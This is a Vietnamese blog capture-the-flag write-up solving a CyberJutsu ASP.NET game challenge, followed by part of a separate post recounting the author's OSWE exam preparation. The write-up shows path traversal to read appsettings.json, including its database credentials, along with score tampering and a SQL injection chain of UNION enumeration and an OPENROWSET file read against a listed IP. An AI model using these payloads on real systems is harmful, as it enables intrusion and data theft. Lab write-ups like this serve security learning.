Web discovery

robots.txt

Sau khi truy cập vào robots.txt thu thập được thêm URL

/Game -> Đã thu thập
/appsettings.json
/Admin
/Areas
/bin
/Controllers
/Models

Dùng browser truy cập hết các đường dẫn và quan sát Burpsuite

/Admin

⇒ Response ở burpsuite → Thu được CBJS_EASTER_EGG

CBJS_EASTER_EGG{Part 2: /lixi/9o3}

Sau bước này thì mình thu thập được thêm thông tin: Server: Kestrel

Các đường dẫn khác như /appsettings.json; /Areas; /bin; /Controllers; /Models ⇒ Khi truy cập vào đều trả về 404 not found ⇒ Tạm thời để đó đã nhé

Tiếp tục tìm hiểu /game

Tôi thử bấm bắt đầu và quan sát khi rắn chạm tường thì được thông báo như vậy

Tiếp tục truy cập thử với đường dẫn /Game/Feedback

⇒ Thử submit form, nhưng khi xem trong request burpsuite thì lại không nhận được request nào, nên tôi thử đọc html,js của nó xem

⇒ Trong html có thẻ img base64 ⇒ nhưng lại không được render ?

Thử decode base64

CBJS_EASTER_EGG{Part 3: XA5V}

Ngoài ra, tìm được thêm /Feedback/Submit Nhưng khi cố gắng thử truy cập hay gửi request đến url này thì đường như không thể, mặc dù đã thử mọi url có thể như vẫn 404 not found

/game/Feedback/Submit
/Admin/Feedback/Submit
…

⇒ Có thể chức năng này đã thực sự bị lập trình viên xóa bỏ

Phân tích request burpsuite

Đến đây, chúng ta đã dạo qua một vòng web bằng browser, bây giờ là lúc tôi thử ngó qua HTTP history của Burpsuite xem như thế nào.

Mở HTTP history của Burpsuite tôi nhận được 1 loạt request như vậy, bây giờ sẽ đi xem từng cái một nè.

Tôi lấy được CBJS_EASTER_EGG part 1 khi xem response của /

Và thu thập thêm các URLs

/Admin/EditBackground
/backgrounds/1.png

Tiếp tực mở browser thử truy cập vào URL /backgrounds/.png

⇒ Tôi nhận thấy đây chính là background lúc chơi game, vì quay lại /game tôi có thể thấy background của nó chính là 1.png

Thử truy cập tiếp /Admin/EditBackground

Ở đường dẫn này mình thu về được 2 thông tin cũng có thể gọi là quý

Lấy được Flag 4: CBJS{Unauth_On___________Đã ẩn thông tin_____________________Ofection}
Có một form edit background → Nhìn vào form thì chúng ta đoán ra được param
- Method: post
- URL: /Admin/EditBackground
- Body: selectedBackground → Giá trị của nó truyền vào có thể là: 1.png, 2.png, 3.png

Bây giờ thử và bắn luôn một cú request nhé:

Trước tiên, Chuyển request /Admin/EditBackground sang repeater → chuyển đổi method sang POST → Thêm boby selectedBackground=2.png

⇒ Sau khi thử gửi request thành công nhận về code 200 và nội dung trả về có preview content, đoán đoán đâu đó là nội dung của ảnh mà mình vừa cập nhật thành công.

Thử tiếp chức năng Show response in browser của browser sẽ thấy như hình phải bên dưới.

Quay về page /game và thấy background đã đổi

Đến đoạn này mình dừng lại 1 nhịp để phẩn tích xem: Vậy selectedBackground nhận vào tên file → Thay đổi background và hiển thị nội dung preview content

⇒ Có thể đặt ra câu hỏi liệu chỗ này có thể là lỗ hổng Path traversal để đọc file tùy ý không?

Trong đề bài cho mình biết chắc chắn có 1 file tồn tại trong server rồi là: /tmp/FLAG_WEB tôi thử sửa và gửi request

Nhận được Flag 1: CBJS{Ha_________Đã ẩn thông tin________________ke}

Đến đoạn này chúng ta đã xác định được có thể đọc được file tùy ý thông qua lỗ hổng Path traversal ở chức năng này.

Xem tiếp HTTP request history /game và thu thập thêm được đường dẫn /api/ranking có sortParam ⇒ Giá trị của nó có thể lấy từ URL hoặc Score

API lấy danh sách ranking, sort by 1 cột nào đó, cụ thể ở đây là score

Truy cập nhưng không có param thử xem

Mình đã nghĩ đến SQL injection, mình thử bằng tay một số ký tự đặc biệt để xem server có phản ứng dụng không, nhưng không thể confirm được nên mình thử vứt vào ghauri thử.

(Phần này các bạn chắc chắn hỏi vì sao tôi dùng --dbms mssql thực ra cũng là 1 phần kinh nghiệm là asp.net nó hay đi kèm MSSQL giống như PHP hay đi kèm MySQL. Lúc làm mình test thử hết =)) nhưng do lúc chụp ảnh mình chụp phải cái sử dụng --dbms mssql / Fact nữa: khi recon nữa thì ae có thể recon ra được ứng dụng này sử dụng MSSQL nhé)

ghauri -u http://206.189.39.54:8085/api/ranking?sortParam=score --dbms mssql

⇒ Ghauri cũng không ra, nên tạm thời note lại và đi recon tiếp, sau này có bí quá thì quay lại thử cách khác tiếp.

Cứ mỗi lần tìm ra được 1 đường dẫn mới thì mình sẽ thử chạy lại gobuster 1 lần để thử xem còn thư mục nào nhỏ hơn bên trong không? ở đây với /api/ranking cũng vậy.

gobuster dir -e -u http://206.189.39.54:8085/api/ranking -w ~/Tools/SecLists/Discovery/Web-Conte
nt/common.txt -t 50

Sau khi chạy với gobuster lại phát hiện ra được một đường dẫn mới. http://206.189.39.54:8085/api/ranking/Search

Khi truy cập vào thì lập tức bị báo thiếu param: The searchTerm field is required. Tôi thử thêm param searchTerm với giá trị là a và truy cập lại thì cho ra kết quả.

Nhìn qua kết quả trả về có thể hình dung đây là 1 chức năng search, nhận vào keyword lấy từ param searchTerm và tìm kiếm ở cột PlayerName trong database nếu có chưa keyword đó thì hiển thị ra.

Ngay tại đây, tôi có thể nghĩ ngay đến mình phải kiểm tra ngay lỗ hổng SQL injection, tôi hình dung ra câu lệnh SQL mà server xử lý như sau:

SELECT id,playerName,score FROM [Ranking table] WHERE playerName like '%[searchTerm]%';

# [Ranking table]: Là tên bảng, nhưng vì tôi không xác định được tên bảng là gì nên đặt 1 placeholder → mục đích là để hình dung ra câu lệnh sql
# [searchTerm]: Cũng là placeholder đại diên cho giá trị lấy từ param do người dùng chuyển lên

Tiếp theo, tôi thử phản ứng của server đối với các ký tự đặc biệt, tôi đã thử ' và nhận thấy server lập tức trả về 500.

Hình ảnh về SQL injection đang dần hình thành trong đầu tôi, vì khi truyền ' lên khiến câu lệnh truy vấn SQL của server gặp lỗi syntax nên sẽ trả về 500 → Trong đầu tôi nghĩ và hình dung như vậy.

Tôi thử injection đoạn như sau.

' OR 1=1;--+

Nếu giả suy nghĩ tôi đúng, thì câu lệnh SQL của server sẽ biến thành

SELECT id,playerName,score FROM [Ranking table] WHERE playerName like '%' OR 1=1;--+%';

Tôi đệm thêm MMMMMMMMMMM vào searchTerm để mục đích là khiến cho điều kiện playerName like ... sẽ luôn sai, như thế tôi sẽ xác định được phần injection của mình có hoạt động đúng hay không.

⇒ Phần injection sẽ là:%MMMMMMMMMMM' OR 1=1;--+, hình dung câu lệnh SQL sau khi bị injection sẽ trở thành

SELECT id,playerName,score FROM [Ranking table] WHERE playerName like '%MMMMMMMMMMM' OR 1=1;--+%';

Giải thích chỗ này một chút: đó là nếu tôi tìm kiếm với MMMMMMMMMMM thì do trong database không có bản ghi nào chứa MMMMMMMMMMM nên server sẽ không trả về gì cả, mà chỉ trả về 1 mảng rỗng như bên dưới.

Server trả về 200 kèm nội dung là mảng rỗng, mình suy nghĩ theo hướng: vì nó ko tìm ra bản ghi nào chứa MMMMMMMMMMM cả nên là nó trả về data rỗng khi này điều kiện playerName like '%MMMMMMMMMMM%' trong câu lệnh SQL của server sẽ là điều kiện sai ⇒ Bây giờ chúng ta thêm OR 1=1 vào mà trả về data, thì có thể khẳng định 99,99% là lỗ hổng SQL injection.

Tôi thực hiện truy cập vào đường dẫn đã injection payload SQL, và nhận được dữ liệu trả về

Kết luận theo suy nghĩ của tôi: Chức năng này tồn tại SQL injection.

Chúng ta tạm note lại chưa vội khai thác vì còn các đường dẫn khác cần phải khám phá.

Với đường dẫn /Game/SubmitScore

Tôi đoán, khi rắn của người chơi đụng đầu vào tường client sẽ dùng URL gửi điểm người chơi đạt được lên server → Có thể nghĩ đến chuyện thay đổi điểm gửi lên server thì sao?

Tôi liền thử thay đổi điểm và gửi lại request

Cú request thành công và tôi nhận về được CBJS_EASTER_EGG part 5.

CBJS_EASTER_EGG{Part 5 (final): 1R5b}

Tạm tổng kết hành trình recon và discovery

Tôi thu được một số flag:

# EASTER eGG
CBJS_EASTER_EGG{Part 1: }
CBJS_EASTER_EGG{Part 2: /lixi/9o3}
CBJS_EASTER_EGG{Part 3: XA5V}
CBJS_EASTER_EGG{Part 5 (final): 1R5b}

# Flags
Flag 01: CBJS{Ha_________Đã ẩn thông tin________________ake}
Flag 04: CBJS{Unauthorized__________Đã ẩn thông tin_________________Redirection}

⇒ Vậy, tôi còn thiếu EASTER EGG part 4 và 2 flag 02,03

Tôi đã note lại được 1 số chức năng có lỗ hổng mà cần lưu ý

/Game/SubmitScore → Edit score tùy ý và đã có thể sửa đổi được điểm gửi lên server
/api/ranking/Search?searchTerm= → Lỗ hổng SQL injection
/Admin/EditBackground → Lỗ hổng Unauthorized access và Path traversal

Vậy tôi sẽ đi khai thác từng lỗ hổng để đạt đủ các flag và easter egg

Exploit

Unauthorized access + Path traversal

Như trên phần trước tôi đã biết được rằng mình có thể sử dụng được chức năng thay đổi background của Admin mà không cần quyền gì đặc biệt và chức năng này có lỗ hổng Path traversal.

POST /Admin/EditBackground HTTP/1.1
Host: 206.189.39.54:8085
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: 
Connection: keep-alive
Referer: 
Upgrade-Insecure-Requests: 1
Priority: u=0, i

selectedBackground=

Như chúng ta đã biết ứng dụng được lập trình từ asp.net và server là Kestrel, chúng ta có thể hỏi chatgpt 1 số câu hỏi như trong link share này: https://chatgpt.com/share/67a6e798-6bec-8006-9a80-7f878d3380d2

Hãy nhớ đến nội dung file robots.txt

Disallow: /Game
Disallow: /appsettings.json
Disallow: /Admin
Disallow: /Areas
Disallow: /bin
Disallow: /Controllers
Disallow: /Models

Xem mô tả do chatgpt trả về để hình dung được cách tổ chức cấu trúc của dự án này, như vậy liệu chúng ta có thể đọc file appsettings.json để xem có thông tin gì không?

Theo như chatgpt trả lời, Tôi biết rằng có tồn tại appsettings.json ở root folder, nên sử dụng cách thủ công nhất là lần mò từng bước để xác định vị trí đứng, cũng như là đọc được appsettings.json

Tôi thử đã thử từng đường dẫn như sau:

appsettings.json
../appsettings.json
../../appsettings.json -> ok

Như vậy, tôi đứng từ chức năng EditBackground đi ra 2 cấp mới có thể đến root folder: ../.. , thu được Easter egg 04: CBJS_EASTER_EGG{Part 4: VMNp}

Chuyển qua tab render để đọc được văn bản rõ hơn

Tôi đọc rõ hơn và nhận thấy thêm connection string vào database của ứng dụng có chứa credential.

Server=mssql;Database=MyAppDB;User Id=sa;Password=YourStrong!Passw0rd;MultipleActiveResultSets=true;TrustServerCertificate=True;

⇒ Database sử dụng MSSQL, tên database là: MyAppDB

Hoàn thiện đủ bộ Easter egg, giờ ghép lại và nhận lì xì thôi.

CBJS_EASTER_EGG{Part 1: }
CBJS_EASTER_EGG{Part 2: /lixi/9o3}
CBJS_EASTER_EGG{Part 4: VMNp}
CBJS_EASTER_EGG{Part 3: XA5V}
CBJS_EASTER_EGG{Part 5 (final): 1R5b}

=>

Khi truy cập vào đường dẫn thì nhận được thử thách ghép chữ =)) chấm hỏi? Anh Luật biết chơi thật tiền đến tay rồi không cho lấy mà phải ghép chữ tiếp.

Nhưng không sao, tôi thông mình nên sau 1 hồi ghép ghép tôi cũng đoán ra được dây là chữ: HAPPY HACKING

Nhận tiền lì xì thôiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii

Cảm ơn các bạn đã đọc blog, tôi nhận được tiền rồi nên nghỉ thôi, không làm nữa đâu nhé.

Hẹn gặp lại các bạn ở 1000 ngày tiếp theo.

Đùa thôi!

Vì tôi còn tận 2 flag nữa chưa tìm ra, nên với tính tò mò của tôi thì khó mà dừng lại ở đây lắm =))

Nên là, vẫn tiếp tục nhé.

SQL injection

Quay trở lại tiếp tục khai thác nốt lỗ hổng SQL injection, như phần trên tôi đã injection và câu lệnh injection đã hoạt động.

http://206.189.39.54:8085/api/ranking/Search?searchTerm=MMMMMMMMMMM%27%20OR%201=1;--+

Tôi có thể nghĩ ngay đển UNION based

Trước tiên, chúng ta cần xác định đúng vị trí dữ liệu khi trả về mà chúng ta có thể đọc bằng payload:

' UNION SELECT 0,'DATA LEAKED',0;--+

Fact: Có nhiều bạn sẽ hỏi, tại sao mình lại biết mà viết payload này, thì mình dựa vào các thông tin mình có được như sau:

Cú pháp lệnh MSSQL để mình biết ngắt lệnh,comment lệnh thừa, …
Dựa và dữ liệu trả về trước đó → Tôi thấy dữ liệu trả về 1 object có 3 phần tử (3 cột trong database): ID, playerName,score → ID,score thì có thể đoán luôn là integer, playerName là string

⇒ Nên tôi phải viết union select làm sao mà data của tôi trả về đúng 3 cột, 2 cột đầu và cuối là integer và cột giữa là String là được SELECT 0,'DATA LEAKED',0

Giờ đã biết vị trí chúng ta có thể đọc data rồi, bây giờ phải tìm tên bảng, còn tên database đã tìm thấy ở phần trước là: MyAppDB

http://206.189.39.54:8085/api/ranking/Search?searchTerm=%27%20UNION%20SELECT%200,name,0%20FROM%20sysobjects%20WHERE%20xtype%20=%20%27U%27--

\= thu được tên bảng: CyberJutsu

Tiếp theo là xem bảng có những cột nào

http://206.189.39.54:8085/api/ranking/Search?searchTerm=%27%20UNION%20SELECT%200,name,0%20FROM%20syscolumns%20WHERE%20id%20=%20(SELECT%20id%20FROM%20sysobjects%20WHERE%20name%20=%20%27CyberJutsu%27);--

⇒ Như vậy, bảng CyberJutsu có một cột là flag

Bây giờ thì lấy flag thôi nào.

http://206.189.39.54:8085/api/ranking/Search?searchTerm=%27%20UNION%20SELECT%200,flag,0%20FROM%20CyberJutsu--

Như vậy, tôi đã thu thêm được Flag 03: CBJS{S_________Đã ẩn thông tin________________utsu}

Nhiệm vụ vẫn còn, tiếp tục tìm flag 02 nữa để kết thúc bài nhé.

Như đề bài có nói Flag 02 ở trong /tmp/FLAG_DBSERVER

Vậy tôi nghĩ đến việc lợi dụng SQL injection để đọc file flag.

Đến đây sẽ có bạn: ủa sao không đọc luôn flag02 bằng path traversal ở phần trước ⇒ Nhưng chuyện đâu đơn giản vậy, vì có thể file /tmp/FLAG_DBSERVER đã được phân quyền mà user truy cập thông qua ứng dụng không thể đọc được mà chỉ có user truy cập thông qua database mới đọc được. Hoặc là database nằm trên 1 server (1 container) khác so với ứng dụng web thì cũng không đọc được bằng path traversal.

http://206.189.39.54:8085/api/ranking/Search?searchTerm=%27%20UNION%20select%200,(select%20x%20from%20OpenRowset(BULK%20%27/tmp/FLAG_DBSERVER%27,SINGLE_CLOB)%20R(x)>),0;--

Tiếp tục có được Flag 02 heng!!!! xong rồi heng!!!!: CBJS{Have_________Đã ẩn thông tin________________nux?}

Kết bài

Thông tin vẫn ở đó, quan trọng là bạn có tìm thấy không thôi.

Cảm ơn CyberJutsu đã tạo ra bài CTF theo đánh giá của tôi thì khá là hay vì có lì xì.

Cảm ơn các bạn đã đọc bài của mình sau 1000 ngày chờ đợi.

Mình sẽ cố chăm chỉ viết bài hơn, có thể không cần tới 1000 ngày mà 500 ngày gì đó là có bài rồi.

[I passed OSWE] Nguồn gốc và sức mạnh | Tự tin và sự cố gắng

Manhnv — Fri, 29 Jan 2021 00:00:00 GMT

1. Giới thiệu

Xin chào, lại là Tôi - một thằng hay viết các bài blog xàm xàm. Như đã hứa với các bạn đọc ở bài viết Chỉ một buổi chiều, Tôi đã chiếm quyền điều khiển server của 8 website như thế nào? (Một bài viết cũng có thể hay, các bạn đọc thử nhá), Tôi đã hứa là sẽ quay trở lại viết bài với series OSWE, nhưng thôi Tôi quyết định đặt nó thành series I passed OSWE và bài hôm nay sẽ là phần 1 - Nguồn gốc và sức mạnh | Tự tin và sự cố gắng.

Tôi hy vọng rằng bài này sẽ có ích cho bất kỳ ai chuẩn bị học và thi OSWE. Đây chưa phải là bài chia sẻ cách học để thi OSWE, vì đây là bài chia sẻ trải nghiệm quá trình học và thi của Tôi.

Vào hồi 9h sáng ngày 23/01/2021 (dương lịch) Tôi đã bắt đầu bài thi OSWE thời gian thi là 48h, tuy nhiên sau 25h49p Tôi đã hoàn thành 100% bài thi OSWE.

Và đây là mail xác nhận từ Offensive Security gửi cho Tôi.

Và Badge trên website đây: https://www.youracclaim.com/badges/f6400cb3-7bfc-4dad-97c1-af80301d2fea/public_url

Một chứng chỉ tuyệt vời để các bạn muốn học thêm nhiều skills về tấn công web nâng cao (có nhiều skills như thế nào thì các bạn đọc Phần 3 - Sức Mạnh nhé).

Tôi muốn viết nên series này là vì Tôi cũng muốn chia sẻ tý niềm vui khi đạt được chứng chỉ cho các bạn đọc được biết (nói trắng ra là khoe), cũng như review tạo chút động lực cho bạn nào muốn lấy OSWE trong thời gian sắp tới.

Những bạn đang có ý định thi, lỡ có đọc các bài review trượt lên trượt xuống trên mạng thì cũng đừng có hoảng loạn nha, nó cũng chả có gì đâu, cố gắng là được. Lúc mới tìm hiểu OSWE Tôi cũng đi đọc hết các bài review trên mạng, nhưng lạ thay toàn là bài về việc trượt lên trượt xuống 1-2 lần thậm chí 3 lần mới đỗ, nên cũng hoảng lắm.

Nhưng không sao, các bạn tự tin vào bản thân mình thì sẽ có kết quả tốt.

2. Nguồn gốc

Offensive Security Web Expert (OSWE) - Advanced Web Attacks and Exploitation (WEB-300)

OSWE là một trong danh sách 1 tràng chứng chỉ của Offensive Security.

Offensive Security Web Expert (OSWE) là chứng chỉ mà các bạn phải thi mới có thể đạt được sau khi hoàn thành khóa học Advanced Web Attacks and Exploitation (WEB-300). WEB-300 là một khóa học kiểm thử thâm nhập white box cho một ứng dụng web - white box web app penetration tests

Khóa học này sẽ dạy cho các bạn:

Thực hành phân tích sâu mã nguồn của một ứng dụng web được decompiled.
Tìm kiếm các lỗ hổng về logic mà các tools scan lỗ hổng không thể tìm ra.
Kết hợp các lỗ hổng một cách hợp lý để tạo ra một proof of concept trên ứng dụng web.
Khai thác các lỗ hổng bằng cách xâu chuỗi chúng thành các cuộc tấn công phức tạp.

Yêu cầu đề học được khóa học này là bạn cần có sẵn một số kiến thức nhỏ nhẹ như này trước thôi.

⇒ Về cơ bản nó là thế, các bạn có thể tham khảo khái niệm tại: https://www.offensive-security.com/awae-oswe/

Khi đăng ký khóa học bạn sẽ được cấp một file pdf tài liệu có hơn 410 trang bao gồm lý thuyết vào hướng dẫn thực hành cho 09 modules về white box và +1 module từ bản cập nhật mới nhất vào tháng 7/2020, đi kèm với đó là các video hướng dẫn bằng tiếng anh cho từng module (Đâu đấy 10 tiếng video thì phải, Tôi lấy thông tin trên trang của Offensive Security , Tôi chưa kiểm tra thực tế, vì lúc tải video về đến lúc thi, Tôi xem đúng mỗi video của phần dotnetnuke).

Các phần lý thuyết, thực hành được hướng dẫn cực kỳ chi tiết cũng như các khái niệm có refer đến tài liệu gốc, giúp bạn dễ dàng hơn trong quá trình tìm hiểu khóa học. Các bạn không chỉ được học cách khai thác đơn thuần mà còn được học cách làm sao để bypass waf khi exploit nữa (trong bài thi có bypass waf nhé).

Thử tham khảo Syllabus để biết hơn chi tiết về giáo trình.

Labs của AWAE có gì?

Khi đăng ký khóa học ngoài việc được cấp tài liệu và video ra các bạn còn được cấp VPN để connect đến hệ thống labs của khóa học. Có 10 máy dành cho 10 modules của khóa học, và 3 máy Exercises and Extra Miles

Trong đấy:

10 máy dành cho modules sẽ có hướng dẫn chi tiết từng bước cho các bạn nắm bắt cách khai thác.
Trong 10 modules, sau mỗi module sẽ có thêm 1 mục gọi là Extra miles để các bạn khai thác tiếp chính module đó, phần này các bạn phải tự làm và không có một hướng dẫn nào hết.
Ngoài ra còn 3 máy extra miles thêm, 3 máy này hoàn toàn không có hướng dẫn, và các bạn phải tự try harder.

Thực sự labs của AWAE đang còn quá nghèo nàn, chưa được phong phú, nhưng cũng đủ cho các bạn đau đầu trong quá trình học đấy.

Tóm lại

Cái hay của OSWE theo Tôi đánh giá: là sẽ hướng dẫn cho bạn cách để tìm ra được các lỗ hổng về logic trong source code của một ứng dụng web, rất hợp cho nhưng bạn theo hướng tìm kiếm 0days. Các bạn sẽ cảm nhận cái sung sướng khi mà tự Tôi tìm ra được một lỗ hổng, tự viết POC để khai thác dựa trên sự kết hợp nhiều lỗ hổng lại với nhau để tạo ra một exploit hoàn thiện, ta nói nó sướng dã man luôn. Khi làm được như thế, bạn sẽ có cảm giác gì đó sung sướng, lâng lâng, như một vị thần. Vì vậy, nên một số bạn không có ý định thi cert nhưng vẫn có thể tham khảo mua để học vì có thể có những skills mà các bạn đang bị thọt.

Tuy nhiên, một tin buồn dành cho các bạn sắp đăng ký học và thi OSWE là: Từ ngày 01/01/2021, Offensive Security đã bỏ đi gói có thời gian dùng labs 30 ngày và chỉ còn 2 gói là 60 ngày, 90 ngày. Nhưng cũng vì thế mà những bạn cũng nghèo nghèo như Tôi cảm thấy thật là đau thận khi quyết định vung tiền mua khóa học. Cụ tỉ như sau:

3. Sức mạnh

Skills sau khi học có được

Có rất nhiều kỹ năng về tấn công web mà bạn có thể học được trong khóa học này như:

Quá trình học

Tôi đã dành dụm, chắt chiu tiền để mua khóa học, và thật may mắn khi mà tháng 12/2020 Offensive Security có đợt sale blackfriday cho khóa học 30 ngày labs còn $999. Tôi đã nhanh trí mua vào ngày 25/12, tuy nhiên thời gian gần nhất để có thể nhận khóa học là sang cuối đến tháng 3, nhưng tôi quyết định thanh toán với lịch là tháng 3. Sau khi thanh toán thành công, có mail xác nhận, tôi dùng chiêu sách đi năn nỉ Offensive Security cho tôi được học sớm hơn. Sau khoảng 5 mail qua lại xin xỏ, trình bày lý do thì Offensive Security cũng sắp xếp cho tôi nhận khóa học vào ngày 27/01/2021, như vậy là sớm hơn 2 tháng. Tôi muốn được học để thi trước khi nghỉ tết.

Tại đây, ngay trong bài viết này Tôi trân trọng cảm ơn Offensive Security đã tạo điều kiện cho Tôi.

Đây là quả lịch tôi note linh ta linh tinh này =))

Tôi đã nhận được khóa học vào ngày 27/12/2020 , sau khi nhận khóa học tôi dành ra 1 tuần để đọc tài liệu. Tuy là sau mỗi module sẽ có bài extra miles nhưng tuần đầu tiên tôi không bắt tay làm nó vội, mà chỉ đọc tài liệu để cảm nhận overview thôi. Sau khi cảm nhận được overview, tôi quyết định vào chọn luôn ngày thì là 30/01/2021, vì thấy nó đúng sở trường của Tôi rồi. Thực sự nói là đúng sở trường thế thôi, nhưng đọc đến module dotnetnuke Tôi cũng sợ lắm, vì trước giờ tôi không thích hàng microsoft cho lắm, nên là không tìm hiểu về nó. Tuy nhiên Tôi đã tìm đến 2 video: học c# trong 1 giờ, học .net trong 1 giờ. Học xong vẫn sợ, nhưng Tôi tự tin từ đó đến ngày đăng ký thi tôi sẽ thành thạo khai thác lỗi dotnet.

Sau khi đăng ký ngày thi xong, tôi quyết định try harder với 3 máy Extra miles. Hôm đấy là 03/01/2021 - một ngày chủ nhật, Tôi chọn bài đầu tiên là một bài về nodejs, tối hôm đó tôi đã hình dung ra vector bypass authentication rồi, tuy nhiên mãi sáng sớm ngày hôm sau tôi mới thực sự bypass authentication của máy đầu tiên, tôi cảm giác nó cũng dễ dàng. Trên đà chiến thắng, tôi quật luôn RCE được luôn con máy đó, tuy nhiên không dễ tý nào, vì lâu lắm rồi không code nodejs nên tôi phải ngồi đọc lại một số thứ về nó. Nhưng cũng nhanh thôi sáng 05/01/2021 - tức là 3 ngày làm máy đầu tiên thì tôi đã có được RCE. Tôi tự thấy Tôi như thần thánh, nhưng thật sự chỉ là cảm giác sung sướng lúc đó khiến tôi ảo tưởng vậy thôi.

Ngày tiếp theo 06/01/2021 tôi tiến hành làm máy thứ 2, bây giờ là một máy java. Tôi nghĩ thầm, java thì chắc ok rồi, vì tôi từng biết lập trình java nên tôi đặt kỳ vọng là bypass authentication được trong ngày. Nhưng nô nồ nồ nồ, đời không như mỡ, tôi vật vã mãi sang ngày hôm sau mới có thể bypass được, vẫn là mất một ngày nữa. Bypass authen xong thì bước tiếp theo vẫn là đi tìm RCE, đến đây quả là một quá trình gian nan, nó làm Tôi nản chí khi mà mất đến tận 3 ngày, tức là từ ngày 07/01/2021 tới ngày 10/01/2021 mà tôi vẫn chưa thể khai thác được RCE cho máy java. Tôi nản toàn tập, nhưng không thể như thế mà bỏ cuộc được. Nên tôi quyết định tạm gác máy java lại và làm sang máy khác.

Ngày 11/01/2021 tôi làm máy tiếp theo, máy này là một máy blackbox. Tôi phải tìm cách để bypass authen bằng phương pháp blackbox trong khi đang luồng suy nghĩ của whitebox =)) , thật là vật vã quá đi. Thế thì mới gọi là cuộc sống, tôi lại thất bại lần đầu cho máy này sau 3 ngày chọc ngoáy, sau này tôi mới biết là do tôi thọt kiến thức, nên mới miss case, nhưng sẽ là hồi sau. Còn bây giờ, tôi quyết định quay trở lại máy java một lần nữa.

Ngày 14/01/2021, tôi quay lại máy java và thật là vui khi mà cuối ngày hôm đó tôi đã RCE được máy java.

Ngày 15/01/2021, tôi đã liên tục và bypass và RCE được máy blackbox. Đó là một máy python.

Sau khi quẩy được máy blackbox, chính là lúc tôi đã pass được 3 máy extra miles, mà tất cả là nhờ việc try hard, không có hướng dẫn hay bất cứ hint nào. Thực mà nói, lúc nản với máy blackbox tôi đã đi hỏi hint ở trên diễn đàn, tôi đang bài đàng hoàng, nhưng không ai trả lời =))

Tôi quyết định vào đổi ngày thi, tôi đổi từ ngày 30/01/2021 xuống còn 27/01/2021 tức là sớm hơn 3 ngày, càng tự tin thì tôi lại càng muốn thi sớm, vì tính máu chiến bắt đầu tăng lên.

Tôi tính, từ ngày 16/01/2021 sẽ làm tất cả các bài extra miles sau mỗi module và đọc thật kỹ về deserialize .net, nhưng thật hay khi mà sang tối ngày 19/01/2021 tôi đã hoàn thành hết các phần extra miles, cũng như đã lĩnh hội được dotnet 😅. Các bạn biết gì tiếp theo rồi chứ gì?

Đúng, lại một lần nữa tôi vào thay đổi lịch thi, bây giờ là sang ngày 23/01/2021, vì bài thi có thời gian 48h và 1 ngày viết report, nên tôi tối ưu chọn ngày cuối tuần để thi vì ngày bình thường còn đi làm ở công ty.

Đăng ký lại lịch thi xong, mấy ngày còn lại là tôi đọc lại tài liệu 1 lần nữa, ghi chép tất cả những câu lệnh, cách cấu hình, cách debug, cách bypass waf, ... ra notes. Và yên tâm ngồi rung đùi chờ ngày thi.

Quá trình thi

Bài thi có tận 6 yêu cầu cho mỗi 1 bài lận, nhưng Tôi ko thể show ra đây mà chỉ nói sương sương như: Phải có screenshots tất cả các bước bạn tìm ra được lỗ hổng, screentshot nội dung file local.txt và proof.txt, viết 1 poc script duy nhất để khai thác từ đầu đến cuối cho mỗi một bài, .... Các bạn cứ làm đủ yêu cầu của nó là được.

Như các bạn đã đọc bên trên Tôi bắt đầu bài thi vào 9h sáng ngày 23/01/2021 (dương lịch, ngày thứ 7). Bình thường tôi dậy rất muộn vì cuối tuần, nhưng sáng hôm đấy dậy rõ sớm, đánh răng rửa mặt đi húp bát cháo hành ở chợ. Chuẩn bị tâm lý sẵn sàng lên thớt.

Đúng 8h45h, tôi phải có mặt để làm thủ tục checkin để chuẩn bị cho bài thi, các bạn nhớ chuẩn bị chứng minh thư sẵn sàng, và dọn dẹp bàn ngồi thi cũng như xung quanh thật gọn gàng, tốt nhất là cất hết các đồ dùng như: Điện thoại, máy tính bảng, ... nói chung là các thiết bị mà bạn có thể liên lạc ra bên ngoài phải cất đi, không được dùng đến. Máy tính dùng để làm tốt nhất không mở các phần mềm chat, teamviewer, ...

Sau khi checkin các thứ xong, giám thi xác nhận tôi đủ điều kiện có thể tham gia thi, thì tôi được gửi cho một mail nữa chứa các thứ như: vpn để connect đến bài thi, hướng dẫn, tài khoản đăng nhập, ... Tôi tải về, đăng nhập và xác nhận với giám thi là VPN có thể connected. Từ đó tôi bắt đầu thi.

Họ cũng cấp cho Tôi tất cả là 5 máy: 2 máy debug, 2 máy target, 1 máy kali có thể dùng như là 1 máy attacker thay vì dùng chính máy tính cá nhân.

Vào thi máy đầu tiên, tôi gặp rắc rối khi cố tình debug lên máy target, vì trong quá trình học họ cấp cho máy target và máy debug là 1 máy, nhưng lúc thi là 2 máy riêng biệt, nên đoạn đầu không định hình được, tôi còn mail cho bên support là Tôi không thể debug được bài thi. 😑 Bây giờ nghĩ lại mà nó ngu vcd. Tôi mất khoảng 2 tiếng đầu cho việc ngồi cố tìm cách debug con target. Sự ngu dốt phải trả giá bằng tiền bạc là đây.

Đến tầm 11h trưa hôm đó, tôi mới lĩnh ngộ là Tôi chỉ debug trên máy debug thôi, hahaha và lúc đấy tôi mới thực sự vào thi. Thật bế tắc khi mà đến gần 13h chiều, tức là gần 4 tiếng trôi qua, tôi chưa thể tìm ra một vector nào để có thể bypass authen được bài đầu tiên. Tôi quyết định xin break, đi ra chợ làm bát cháo và mua một số đồ ăn vặt về để vừa làm vừa ăn.

Thật may khi hầu như tôi rất nhanh quên mọi thứ nhưng đối với code thì lại nhớ rất dai một source code tôi đã đọc rồi thì tôi hình dung được nó trong đầu luôn, và lúc ăn cháo đầu tôi luôn suy nghĩ đến vector nào có thể khai thác được và vạch ra vài ý trong đầu để lúc nữa quay về thử. Đúng như vậy, 14h chiều tôi có mặt lại phòng và ngồi vào báo với giám thị là Tôi comeback và tiếp tục bài thi. Thật may đúng như những thứ Tôi nghĩ, đến tầm 26h30p chiều ngày hôm đó, vạch ra cách đi cho việc vector bypass authen đầu tiên, nhưng mãi tận 20h44p tối tôi mới hoàn thành được POC đầu tiên và bypass authen thành công, submit flag và xin break gọi nửa con gà Mạnh Hoạch về ăn tạm.

